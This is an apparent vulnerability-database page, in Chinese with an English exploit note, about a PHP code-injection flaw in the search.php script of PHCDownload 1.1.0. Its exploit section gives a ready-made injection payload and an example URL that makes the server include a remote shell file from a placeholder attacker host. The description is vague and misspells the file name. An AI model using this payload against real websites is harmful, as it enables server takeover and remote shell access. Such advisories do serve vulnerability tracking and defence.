PHCDownload 1.1.0 Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052184 漏洞类型
发布时间 2009-02-21 更新时间 2009-02-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009020044
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy.
PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system.

Vendor: http://www.phpcredo.com
Version: 1.1.0 and older
Vuls file: seach.php
Descripton: It is like remote file inclusion but you can run PHP code browser address. I don't know what is called.

Exploit: http://[site]/[path_to_script]/search.php
Input: ">< <?php PHP code here ?>

Example: http://[site]/[path_to_script]/search.php?string=">< <?php include("http://attacker_site/SHELL_FILE"); ?>